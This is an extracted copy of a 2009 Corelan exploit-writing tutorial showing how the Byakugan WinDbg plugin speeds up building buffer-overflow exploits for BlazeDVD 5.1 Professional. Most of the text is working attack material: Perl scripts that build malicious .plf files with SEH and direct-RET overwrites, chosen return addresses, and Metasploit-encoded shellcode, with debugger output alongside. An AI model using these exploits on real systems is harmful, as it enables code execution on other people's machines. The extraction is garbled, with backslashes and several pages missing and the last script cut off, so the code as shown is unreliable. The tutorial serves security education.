This document discusses how debugger modules and plugins like Byakugan can help speed up the basic exploit development process. It provides an example using Byakugan to develop an exploit for a vulnerability in BlazeDVD in just one crash. Byakugan is loaded in WinDbg and used to find the offset to EIP when triggering the crash with a Metasploit pattern, identifying it as an SEH exploit. Byakugan's searchOpcode function finds a suitable pop pop ret, which is then used to build the exploit payload to launch calc.exe and demonstrate successful exploitation in a single run.
1. http://www.corelan.be:8800 - Page 1 / 20
Peter Van Eeckhoutte´s Blog
I explain stuff... (or at least, I try to) - :: [Knowledge is not an object, it´s a flow] ::
Exploit writing tutorial part 5 : How debugger modules & plugins can
speed up basic exploit development
Peter Van Eeckhoutte ¡ Saturday, September 5th, 2009
In the first parts of this exploit writing tutorial, I have mainly used Windbg as a tool to watch
registers and stack contents while evaluating crashes and building exploits.
Today, I will discuss some other debuggers and debugger plugins that will help you speed up this
process.
A typical exploit writing toolkit arsenal should at least contain the following tools :
q windbg (for a list of Windbg commands, click here)
q ollydbg
q immunity debugger (requires python)
q metasploit
q pyDbg (if you are using python and want to build your own custom debugger, as explained in the
awesome Gray Hay Python book
q scripting tools such as perl / python, etc
In the previous chapters, we have already played with windbg, and I have briefly discussed a
windbg extension / plugin from Microsoft, which will evaluate crashes and will tell you if they
think the crash is exploitable or not. This plugin (MSEC) can be downloaded from
http://www.codeplex.com/msecdbg. While MSEC can be handy to give you a first impression,
donât rely on it too much. Itâs always better to manually look at registers, stack values, and try to
see if a vulnerability can lead to code execution or not.
Byakugan : introduction, pattern_offset and searchOpcode
Everybody knows that ollydbg has numerous plugins (Iâll talk about these plugins later). Windbg
also has a framework/API for building plugins/extension. MSEC was just one exampleâŚ
Metasploit has built & released their own windbg plugin about a year ago, called byakugan.
Pre-compiled binaries for WIndows XP SP2, SP3, Vista and Windows 7 can be found in the
framework3 folder (get latest trunk via svn), under externalsourcebyakuganbin
Place byakugan.dll and injectsu.dll under the windbg application folder (not under winext !), and
put detoured.dll under c:windowssystem32
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 1 / 20
2. http://www.corelan.be:8800 - Page 2 / 20
What can you do with byakugan.dll ?
q jutsu : set of tools to track buffers in memory, determining what is controlled at crash time, and
discover valid return addresses
q pattern_offset
q mushishi : framework for anti-debugging detection and defeating anti-debugging techniques
q tenketsu : vista heap emulator/visualizer.
Injectsu.dll handles hooking of API functions in the target process. It creates a
back-channel-information-gathering-thread which connects to the debugger.
Detoured.dll is a Microsoft Research hooking library, and handles trampoline code, keeps track of
hooked functions and provides auto fix-ups on function trampolines.
Today, I will only look at byakugan, more specifically the jutsu component (because I can use
techniques explained in the first parts of this tutorial series to demonstrate the features of that
component) and pattern_offset.
You can load the byakugan module in windbg using the following command :
0:000> !load byakugan
[Byakugan] Successfully loaded!
The jutsu component offers the following functions :
q identBuf / listBuf / rmBuf : find buffers (plain ascii, metasploit patterns, or data from file) in
memoryâŚ
q memDiff : compare data in memory with a pattern and mark the changes. This will help you
determining whether e.g. shellcode has been changed/corrupted in memory, whether certain âbad
charactersâ need to be excluded from shellcode, etc
q hunt
q findReturn : search for the addresses that point to a usable function to return to.
q searchOpcode : converts assembler instruction to opcode, AND it lists all executable opcode sequence
addresses at the same time.
q searchVtptr
q trackVal
In addition to jutsu, thereâs pattern_offset, which allows you to find a metasploit pattern in memory
and shows the offset to eip
In order to demonstrate how byakugan can speed up the exploit development process, weâll use a
vulnerability found in BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0, where a malformed plf
file leads to a stack buffer overflow.
Weâll try to build a working exploit with only one crash :-)
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 2 / 20
3. http://www.corelan.be:8800 - Page 3 / 20
Get yourself a copy of BlazeDVD 5 Professional from http://www.blazevideo.com/download.htm
A local copy of this vulnerable application can be downloaded here :
[download id=40]
Usually, we would start with building a payload that contains lots of Aâs. But this time we will use
a metasploit pattern right away.
Create a metasploit pattern that contains 1000 characters and save the pattern in a file (e.g.
blazecrash.plf) :
peter@sploitbuilder1 ~/framework-3.2/tools
$ ./pattern_create.rb 1000 > blazecrash.plf
Launch windbg, and execute blazedvd from within windbg. (This will make sure that, if the
application crashes, windbg will catch it). Push the application out of the breakpoint (you may
have to press F5 a couple of times (about 27 times on my system) to launch the application). When
blazeDVD is launched, open the plf file (which only contains the metasploit pattern). When the
application dies, press F5 again.
You should get something like this :
(5b0.894): Access violation(5b0.894): Access violation - code c0000005 (first chance)
- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=062ddcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
Now itâs time to use byakugan. Load the byakugan module and see if it can find the metasploit
pattern somewhere :
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 1000
[Byakugan] Control of ecx at offset 612.
[Byakugan] Control of eip at offset 612.
Cool. Not only have we validated the buffer overflow, but we alo know the offset, all in one run. It
looks like we have overwritten RET⌠but before concluding that this is a plain RET overwrite,
always run !exchain, just to verify.
0:000> !exchain
0012afe4: 0012afe4: ntdll!ExecuteHandler2+3a (7c9032bc)
ntdll!ExecuteHandler2+3a (7c9032bc)
0012f5b8: 0012f5b8: <Unloaded_ionInfo.dll>+41347540 (41347541)
<Unloaded_ionInfo.dll>+41347540 (41347541)
Invalid exception stack at 33754132
Itâs SEH based. The offset shown (612) is the offset to nSEH. So in order to overwrite next SEH,
we need to subtract 4 bytes to get the real offset. (= 608)
We know that a typical SEH based exploit looks like this :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 3 / 20
4. http://www.corelan.be:8800 - Page 4 / 20
[junk][jump][pop pop ret][shellcode]
Letâs find a pop pop ret, and weâll
q jump 30 bytes (instead of 6 bytes)
q start shellcode with nops (to compensate for the 30 byte jump)
Find pop pop ret : You can still use findjmp, or you can use !jutsu searchOpcode. The only
drawback with !jutsu searchOpcode is that youâll have to specify the registers (with findjmp, youâll
get all pop pop ret combinations). But letâs use searchOpcode anyway. Weâll look for pop esi, pop
ebx, ret
0:000> !jutsu searchOpcode pop esi | pop ebx | ret
[J] Searching for:
> pop esi
> pop ebx
> ret
[J] Machine Code:
> 5e 5b c3
[J] Executable opcode sequence found at: 0x05942a99
[J] Executable opcode sequence found at: 0x05945425
[J] Executable opcode sequence found at: 0x05946a1e
[J] Executable opcode sequence found at: 0x059686a0
[J] Executable opcode sequence found at: 0x05969d91
[J] Executable opcode sequence found at: 0x0596aaa6
[J] Executable opcode sequence found at: 0x1000467f
[J] Executable opcode sequence found at: 0x100064c7
[J] Executable opcode sequence found at: 0x10008795
[J] Executable opcode sequence found at: 0x1000aa0b
[J] Executable opcode sequence found at: 0x1000e662
[J] Executable opcode sequence found at: 0x1000e936
[J] Executable opcode sequence found at: 0x3d937a1d
[J] Executable opcode sequence found at: 0x3d93adf5
⌠(etc)
Look for addresses in the address range of one of the executable modules / dllâs from BlazeDVD.
(you can get the list of executable modules with windbgâs âlmâ command). On my system (XP
SP3 En), addresses starting with 0x64 will work fine. Weâll use 0x640246f7
0:000> u 0x640246f7
MediaPlayerCtrl!DllCreateObject+0x153e7:
640246f7 5e pop esi
640246f8 5b pop ebx
640246f9 c3 ret
Letâs build our exploit :
my $sploitfile="blazesploit.plf";
my $junk = "A" x 608; #612 - 4
my $nseh = "xebx1ex90x90"; #jump 30 bytes
my $seh = pack('V',0x640246f7); #pop esi, pop ebx, ret
my $nop = "x90" x 30; #start with 30 nop's
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 4 / 20
5. http://www.corelan.be:8800 - Page 5 / 20
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
"x45x34x4cx4bx50x46x50x30x4cx4bx51x50x44x4c" .
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx42x48x43x38" .
"x4bx39x4ax58x4dx53x49x50x43x5ax50x50x43x58" .
"x4cx30x4dx5ax45x54x51x4fx42x48x4dx48x4bx4e" .
"x4dx5ax44x4ex50x57x4bx4fx4bx57x43x53x43x51" .
"x42x4cx43x53x43x30x41x41";
$payload =$junk.$nseh.$seh.$nop.$shellcode;
open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
Try it - works fine on my system.
This was a pretty straigthforward example.. and perhaps we got lucky this time, because there are a
number of drawbacks when building an exploit almost blindly, purely based on the output of the
byakugan features :
q we donât know if the address used for the pop pop ret is in a module that is compiled with safeseh. I
have spoken with Lurene Grenier (who has written byakugan) and this is one of the features on his to
do list. (He also mentioned that he will try to build in aslr awareness and some kind of
wildcard/exclusion support)
q we did not validate the shellcode placement (but by jumping 30 bytes and using nopâs, we have
increased our chances slightly)
q if the exploit doesnât work (because of shellcode corruption or small buffers), weâll have to do the
work all over again, manually this time.
But still, if it works, then you have saved yourself a lot of time
Byakugan : memDiff
Letâs use the same vulnerability/exploit to discuss some of the other features of byakugan.
Weâll use the same sploit, but instead of doing the jump (0xeb,0x1e), weâll put in 2 breakpoints
(0xcc,0xcc), so we can observe if our original shellcode matches with what we have put in memory
(so we can identify shellcode corruption and possible bad characters).
First, we will simply compare the shellcode in memory with the original shellcode, and, to
demonstrate the diff functionalities, weâll modify the shellcode (so we can see the differences)
We need to put the shellcode in a text file (not in ascii, but write the bytes/binary to the text file) :
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 5 / 20
7. http://www.corelan.be:8800 - Page 7 / 20
The windbg output did not show any bold characters, so we have an identical match (as expected).
Now modify the exploit script and change some random shellcode bytes, and do the exercise again.
(I have replaced all x43âs with x44 - 24 replacements in total)
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !jutsu memDiff file 302 c:sploitsblazevideoshell.txt 0x0012f5de
ACTUAL EXPECTED
ffffff89 ffffffe3 ffffffdb ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 44 44 44 ffffff89 ffffffe3 ffffffdb
ffffffc2 ffffffd9 73 fffffff4 59 49 49 49 49 49 43 43 43
44 44 44 51 5a 56 54 58 33 30 56 58 34 41 50 30 43 43 43 51 5a 56 54 58 33 30 56 58 34 41 50 30
41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41 41 33 48 48 30 41 30 30 41 42 41 41 42 54 41 41
51 32 41 42 32 42 42 30 42 42 58 50 38 41 44 4a 51 32 41 42 32 42 42 30 42 42 58 50 38 41 43 4a
4a 49 4b 4c 4b 58 51 54 44 30 45 50 45 50 4c 4b 4a 49 4b 4c 4b 58 51 54 43 30 45 50 45 50 4c 4b
47 35 47 4c 4c 4b 44 4c 44 35 44 38 44 31 4a 4f 47 35 47 4c 4c 4b 43 4c 43 35 44 38 43 31 4a 4f
4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b 4c 4b 50 4f 44 58 4c 4b 51 4f 47 50 45 51 4a 4b
50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50 50 49 4c 4b 46 54 4c 4b 45 51 4a 4e 50 31 49 50
4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a 4c 59 4e 4c 4c 44 49 50 44 34 45 57 49 51 49 5a
44 4d 44 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54 44 4d 43 31 49 52 4a 4b 4b 44 47 4b 50 54 47 54
45 54 44 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b 45 54 43 45 4a 45 4c 4b 51 4f 46 44 45 51 4a 4b
45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 44 31 45 36 4c 4b 44 4c 50 4b 4c 4b 51 4f 45 4c 43 31
4a 4b 4c 4b 45 4c 4c 4b 44 31 4a 4b 4d 59 51 4c 4a 4b 4c 4b 45 4c 4c 4b 43 31 4a 4b 4d 59 51 4c
46 44 44 34 49 53 51 4f 46 51 4b 46 44 50 46 36 46 44 43 34 49 53 51 4f 46 51 4b 46 43 50 46 36
45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b 45 34 4c 4b 50 46 50 30 4c 4b 51 50 44 4c 4c 4b
42 50 45 4c 4e 4d 4c 4b 42 48 44 38 4b 39 4a 58 42 50 45 4c 4e 4d 4c 4b 42 48 43 38 4b 39 4a 58
4d 53 49 50 44 5a 50 50 44 58 4c 30 4d 5a 45 54 4d 53 49 50 43 5a 50 50 43 58 4c 30 4d 5a 45 54
51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f 51 4f 42 48 4d 48 4b 4e 4d 5a 44 4e 50 57 4b 4f
4b 57 44 53 44 51 42 4c 44 53 44 30 41 41 4b 57 43 53 43 51 42 4c 43 53 43 30 41 41
[J] Bytes replaced: 0x89 0xe3 0xdb 0xc2 0xd9 0xf4 0x43
[J] Offset corruption occurs at:
Now we see 24 bytes in bold (which corresponds with the 24 bytes that were change in the exploit
script). This is a good way to determine whether shellcode (or ascii patterns or metasploit patterns)
were changed in memory. You can also see the âBytes replacedâ. Compare the line of bytes with
the line that was printed out in the first test. We now see 0x43 added to the list (which is exactly
the byte that was changed in my shellcode)⌠Way to go byakugan ! High five again !
memDiff can really save you lots of time when you need to compare shellcode and find bad
charactersâŚ
Note : memDiff types are parameters :
0:000> !jutsu memDiff
[J] Format: memDiff <type> <size> <value> <address>
Valid Types:
hex: Value is any hex characters
file: Buffer is read in from file at path <value>
buf: Buffer is taken from known tracked Buffers
Byakugan : identBuf/listBuf/rmBuf and hunt
These 3 jutsu functions will help you finding buffer locations in memory.
Letâs assume the following script :
my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3AbâŚ";
my $nseh = "xccxccx90x90"; #jump 30 bytes
my $seh = pack('V',0x640246f7); #pop esi, pop ebx, ret
my $nop = "x90" x 30; #start with 30 nop's
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 7 / 20
8. http://www.corelan.be:8800 - Page 8 / 20
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
"x45x34x4cx4bx50x46x50x30x4cx4bx51x50x44x4c" .
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx42x48x43x38" .
"x4bx39x4ax58x4dx53x49x50x43x5ax50x50x43x58" .
"x4cx30x4dx5ax45x54x51x4fx42x48x4dx48x4bx4e" .
"x4dx5ax44x4ex50x57x4bx4fx4bx57x43x53x43x51" .
"x42x4cx43x53x43x30x41x41";
$payload =$junk.$nseh.$seh.$nop.$shellcode;
open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
open ($FILE2,">c:shell.txt");
print $FILE2 $nop.$shellcode;
close($FILE2);
Note : âmy $junkâ contains a metasploit pattern of 608 characters. (so youâll have to
create it yourself and paste it in the script - it was too long to put it on this page).
nseh contains breakpoints. And finally, at the bottom of the script, the nops +
shellcode are written to a file (c:shell.txt).
Open windbg, launch blazeDVD, open the sploit file (which should make the application die). First
change exception :
(d54.970): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_ionInfo.dll>+0x37694135:
37694136 ?? ???
Now create 2 identBuf definitions : one for the metasploit pattern, and one for the shellcode :
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !jutsu identBuf file myShell c:shell.txt
[J] Creating buffer myShell.
0:000> !jutsu identBuf msfpattern myBuffer 608
[J] Creating buffer myBuffer.
0:000> !jutsu listBuf
[J] Currently tracked buffer patterns:
Buf: myShell Pattern: ĂŁĂĂĂsĂ´YIIIIICCCCCCQZVT...
Buf: myBuffer Pattern: Aa0Aa1A...
Let byakugan hunt for these buffers :
0:000> !jutsu hunt
[J] Controlling eip with myBuffer at offset 260.
[J] Found buffer myShell @ 0x0012f5c0
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toUpper!
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toLower!
[J] Found buffer myBuffer @ 0x01f561e4
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 8 / 20
9. http://www.corelan.be:8800 - Page 9 / 20
As seen earlier in this post, we could overwrite EIP directly (but we have chosen to go for a SEH
based exploit). Hunt tells us that we control eip at offset 260. So hunt will give us the same results
as !pattern_offset. On top of that, hunt will look for our pre-identified buffers and give us the
addresses. I have asked Lurene Grenier if he could display the offset to a register if this output
(which would make it even easier to find your buffers⌠he told me that he will think of building a
generic solution for this - to be continuedâŚ)
Press âgâ in windbg (to pass the first chance exception to the application). The application now
breaks at our breakpoints (which where placed at nseh)
0:000> g
(d54.970): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=0012f188 ecx=640246f7 edx=7c9032bc esi=7c9032a8 edi=00000000
eip=0012f5b8 esp=0012f0ac ebp=0012f0c0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
<Unloaded_ionInfo.dll>+0x12f5b7:
0012f5b8 cc int 3
Run âhuntâ again :
0:000> !jutsu hunt
[J] Found buffer myShell @ 0x0012f5c0
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toUpper!
[J] Found buffer myShell @ 0x0012f5c0 - Victim of toLower!
[J] Found buffer myBuffer @ 0x01f561e4
We no longer control eip directly via myBuffer (because we have passed on the first exception to
the application), but if we look at eip (0x0012f5b8) , we can see it points to a location that is very
close to buffer myShell (0x0012f5c0) (so a short jump would make the application jump to the
shellcode.
0:000> d eip+8
0012f5c0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0012f5d0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 89 e3 ................
0012f5e0 db c2 d9 73 f4 59 49 49-49 49 49 43 43 43 43 43 ...s.YIIIIICCCCC
0012f5f0 43 51 5a 56 54 58 33 30-56 58 34 41 50 30 41 33 CQZVTX30VX4AP0A3
0012f600 48 48 30 41 30 30 41 42-41 41 42 54 41 41 51 32 HH0A00ABAABTAAQ2
0012f610 41 42 32 42 42 30 42 42-58 50 38 41 43 4a 4a 49 AB2BB0BBXP8ACJJI
0012f620 4b 4c 4b 58 51 54 43 30-45 50 45 50 4c 4b 47 35 KLKXQTC0EPEPLKG5
0012f630 47 4c 4c 4b 43 4c 43 35-44 38 43 31 4a 4f 4c 4b GLLKCLC5D8C1JOLK
This proves that, since our breakpoint is placed at the first byte of where nseh is overwritten, a
jump of 8 bytes (- 2 bytes of code to make the jump itself) will make the app flow jump to our
shellcode.
Byakugan : findReturn
We have seen that we can also build an exploit based on direct RET overwrite (at offset 260).
Letâs build a script that will demonstrate the use of findReturn help us building a working exploit :
First, write a script that will build a payload made up of 264 metasploit pattern characters, followed
by 1000 Aâs :
my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8 . . . Ai7";
my $junk2 = "A" x 1000;
$payload =$junk.$junk2;
open ($FILE,">$sploitfile");a
print $FILE $payload;
close($FILE);
open ($FILE2,">c:junk2.txt");
print $FILE2 $junk2;
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 9 / 20
10. http://www.corelan.be:8800 - Page 10 / 20
close($FILE2);
When opening the sploitfile, windbg reports this :
(c34.7f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c
eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_ionInfo.dll>+0x37694135:
37694136 ?? ???
Letâs use the byakugan arsenal to find all required information to build a working exploit :
q track the metasploit pattern ($junk)
q track the Aâs ($junk2)
q see where eip is overwritten (offset)
q see where $junk and $junk2 are
q find return addresses
0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !jutsu identBuf msfpattern myJunk1 264
[J] Creating buffer myJunk1.
0:000> !jutsu identBuf file myJunk2 c:junk2.txt
[J] Creating buffer myJunk2.
0:000> !jutsu listBuf
[J] Currently tracked buffer patterns:
Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc)
Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc)
0:000> !jutsu hunt
[J] Controlling eip with myJunk1 at offset 260.
[J] Found buffer myJunk1 @ 0x0012f254
[J] Found buffer myJunk2 @ 0x0012f460
[J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper!
0:000> !jutsu findReturn
[J] started return address hunt
[J] valid return address (jmp esp) found at 0x3d9572cc
[J] valid return address (call esp) found at 0x3d9bb043
[J] valid return address (jmp esp) found at 0x3d9bd376
[J] valid return address (call esp) found at 0x4b2972cb
[J] valid return address (jmp esp) found at 0x4b297591
[J] valid return address (call esp) found at 0x4b297ccb
[J] valid return address (jmp esp) found at 0x4b297f91
[J] valid return address (call esp) found at 0x4ec5c26d
[J] valid return address (jmp esp) found at 0x4ec88543
[J] valid return address (call esp) found at 0x4ece5a73
[J] valid return address (jmp esp) found at 0x4ece7267
[J] valid return address (call esp) found at 0x4ece728f
[J] valid return address (jmp esp) found at 0x4f1c5055
[J] valid return address (call esp) found at 0x4f1c50eb
[J] valid return address (jmp esp) found at 0x4f1c53b1
[J] valid return address (call esp) found at 0x4f1c5aeb
[J] valid return address (jmp esp) found at 0x4f1c5db1
[J] valid return address (jmp esp) found at 0x74751873
[J] valid return address (call esp) found at 0x7475d20f
[J] valid return address (jmp esp) found at 0x748493ab
[J] valid return address (call esp) found at 0x748820df
[J] valid return address (jmp esp) found at 0x748d5223
[J] valid return address (call esp) found at 0x755042a9
[J] valid return address (jmp esp) found at 0x75fb5700
[J] valid return address (jmp esp) found at 0x76b43adc
[J] valid return address (call esp) found at 0x77132372
[J] valid return address (jmp esp) found at 0x77156342
[J] valid return address (call esp) found at 0x77506cca
[J] valid return address (jmp esp) found at 0x77559bff
[J] valid return address (call esp) found at 0x7756e37b
[J] valid return address (jmp esp) found at 0x775a996b
[J] valid return address (jmp esp) found at 0x77963da3
[J] valid return address (call esp) found at 0x7798a67b
[J] valid return address (call esp) found at 0x77b4b543
[J] valid return address (jmp esp) found at 0x77def069
[J] valid return address (call esp) found at 0x77def0d2
[J] valid return address (jmp esp) found at 0x77e1b52b
[J] valid return address (call esp) found at 0x77eb9d02
[J] valid return address (jmp esp) found at 0x77f31d8a
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 10 / 20
11. http://www.corelan.be:8800 - Page 11 / 20
[J] valid return address (call esp) found at 0x77f396f7
[J] valid return address (jmp esp) found at 0x77fab227
etc...
Results :
q eip was overwritten at offset 260 from myJunk1.
q myJunk2 (Aâs) was found at 0x0012f460 (which is esp-10). So if we replaced eip with jmp esp, we
can let our shellcode begin at myJunk2 + 10 bytes (or 16 characters)
q we need to remove the last 4 bytes from $junk in our script, and add the address (4 bytes) of jmp esp
or call esp, which will overwrite RET. (Of course, you still need to verify the addressâŚ). Weâll use
0x035fb847 as an example (not shown in the output above, I still prefer to manually select the return
addresses using memdump or findjmp - just because you cannot see the module they belong to in the
output of âfindReturnââŚ
q we need to
rreplace the 1000 Aâs with shellcode
radd at least 16 NOPâs before the shellcode (I have added 50 nops ⌠If you add less, you may see
shellcode corruption, which I easily detected using memDiff)
Script :
my $sploitfile="blazesploit.plf";
my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6A...Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai"; #260 characters
#$junk is now 4 byte shorter
my $ret = pack('V',0x035fb847); #jmp esp from EqualizerProcess.dll
my $nop="x90" x 50;
# windows/exec - 302 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="x89xe3xdbxc2xd9x73xf4x59x49x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4bx58" .
"x51x54x43x30x45x50x45x50x4cx4bx47x35x47x4c" .
"x4cx4bx43x4cx43x35x44x38x43x31x4ax4fx4cx4b" .
"x50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b" .
"x50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31" .
"x49x50x4cx59x4ex4cx4cx44x49x50x44x34x45x57" .
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44" .
"x47x4bx50x54x47x54x45x54x43x45x4ax45x4cx4b" .
"x51x4fx46x44x45x51x4ax4bx45x36x4cx4bx44x4c" .
"x50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4b" .
"x45x4cx4cx4bx43x31x4ax4bx4dx59x51x4cx46x44" .
